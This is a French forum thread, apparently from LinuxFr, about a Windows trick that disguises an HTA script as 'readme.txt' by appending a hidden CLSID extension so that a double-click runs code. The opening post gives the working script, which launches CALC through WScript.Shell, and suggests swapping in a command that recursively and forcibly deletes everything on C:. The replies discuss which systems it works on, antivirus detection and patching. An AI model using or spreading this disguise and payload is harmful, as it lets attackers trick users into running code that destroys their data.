Soit un fichier nommé readme.txt dans lequel nous mettons :
<script>
a=new ActiveXObject("WSCript.Shell");
a.run("CALC");
alert("I am .HTA\n Started command");
</script>
Jusque là, rien d'extraordinaire, mais renommons-le en readme.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} (oui, avec tous les machins héxadécimaux entre accolades après le point).
C'est rigolo, l'extension en hexadécimal n'apparait pas dans exprorer ! On ne voit que readme.txt, un banal fichier texte qui nous demande de le double-cliquer... Et quand on double-clique dessus, c'est magique !
Vous pouvez bien sûr remplacer le CALC par des truc plus rigolos comme "CMD /C DEL /S /F /Q C:\*.*".
# Re: Jouons avec windows
Posté par Pierre Tramonson . Évalué à 2.
Même en désactivant l'ouverture automatique des pièces jointes ?
[^] # Re: Jouons avec windows
Posté par Gazel . Évalué à 2.
[^] # Re: Jouons avec windows
Posté par redfish . Évalué à 1.
R.
[^] # Re: Jouons avec windows
Posté par Woodstock . Évalué à 2.
Je n'ai pas essayé avec son exemple mais avec celui donné plus bas ( http://www.guninski.com/clsidext.html(...) )
J'ai effectivement ce problème sous win98SE
# Re: Jouons avec windows
Posté par arkos (site web personnel) . Évalué à 1.
[^] # Re: Jouons avec windows
Posté par Hardy Damien . Évalué à 4.
Dam
[^] # Re: Jouons avec windows
Posté par Tr4m0 . Évalué à 7.
[^] # Re: Jouons avec windows
Posté par Yann Lugrin (site web personnel) . Évalué à 9.
:-) désolé :-)
# Re: Jouons avec windows
Posté par olaf . Évalué à 1.
[^] # Re: Jouons avec windows
Posté par vincent mary . Évalué à 1.
Le fichier n'est pas non plus associé au bloc note, et me lance bien la calculette.
[^] # Re: Jouons avec windows
Posté par plagiats . Évalué à 2.
le script fourni n'est qu'un exemple, si cela "marche", cela marche avec tous les executables.
la reference en accolade se trouve dans la bdr et identify le fichier comme == executable.
plagiats
[^] # Re: Jouons avec windows
Posté par fulmicoton . Évalué à 1.
(j'en profite pour ajouter mes 2 kopeks : mon Outlook du boulot affiche toute l'extension, sort un gros avertissement et empêche l'exécution immédiate du truc)
[^] # Re: Jouons avec windows
Posté par _alex . Évalué à 1.
# Re: Jouons avec windows
Posté par BeTraVE . Évalué à 2.
Enfin en même temps c'est utilisé quelque chose que tout le monde déteste, donc c'est une mauvaise idée. Je sors : []
[^] # Re: Jouons avec windows
Posté par yugz . Évalué à 1.
# Re: Jouons avec windows
Posté par plagiats . Évalué à 1.
par contre norton antivirus (..cher..) qualifie directement le readme de virus (..bien..). donc il y a un espoir pour nos amis windowsiens névrotiques applicants régulièrement leurs mises à jour et disposant d'un antivirus également mis à jour régulièrement.
quoi "ce n'est pas le cas de la majorité des windowsiens" ?
a vous écouter on finirait par croire qu'une faille corrigée depuis plusieurs mois pourrait se transformer en gros virus de l'année qui "blast" tout sur son passage... ;-)
plagiats
[^] # Re: Jouons avec windows
Posté par _gp . Évalué à 1.
[^] # Re: Jouons avec windows
Posté par cumulus . Évalué à 1.
# Re: Jouons avec windows
Posté par inico (site web personnel) . Évalué à 1.
Comme c'est du recommandé , les utilisateur ne veront pas l'extention bizarre et ce feront avoir !
Vive MS !
Suivre le flux des commentaires
Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.